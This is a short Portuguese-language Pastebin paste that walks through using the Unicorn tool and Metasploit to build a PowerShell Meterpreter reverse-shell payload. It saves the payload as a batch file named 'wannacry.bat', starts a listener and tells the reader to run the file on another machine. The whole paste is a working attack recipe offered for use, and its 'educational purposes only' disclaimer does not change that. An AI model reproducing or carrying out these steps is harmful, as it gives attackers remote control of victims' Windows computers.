lollhosh

HACK & BYPASS : WINDOWS 10 2017 usando UNICORN

May 15th, 2017
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. ################################################################
  2. L.O.L.L.H.O.S.H
  3. ################################################################
  4.  
  5. Bom primeiramente usar o comando
  6.  
  7. # git clone https://github.com/trustedsec/unicorn
  8. # cd unicorn/
  9. # chmod +x unicorn.py
  10. atualizar a ferramenta use:# git pull origin master
  11. # ./unicorn.py --help
  12.  
  13. ex:python unicorn.py windows/meterpreter/reverse_tcp my.local.machine.ip myport
  14.  
  15. # python unicorn.py windows/meterpreter/reverse_tcp 192.168.25.1 7979
  16.  
  17. output file : powershell_attack.txt
  18.  
  19. salvar no desktop : cp powershell_attack.txt /home/User/Desktop/wannacry.bat
  20.  
  21. # service apache2 start
  22.  
  23. NO METASPLOIT USAR:
  24. # use exploit/multi/handler
  25. # set payload windows/meterpreter/reverse_tcp
  26. # set LHOST 192.168.25.1
  27. # set LPORT 7979
  28. # exploit
  29.  
  30. e MIAU
  31. sรณ colar ou executar o bat em outra maquina #hacked
  32.  
  33. ################################################################
  34. FINS EDUCATIVOS. NรƒO ME RESPONSABILIZO POR SEUS ATOS
  35. ################################################################
Add Comment
Please, Sign In to add comment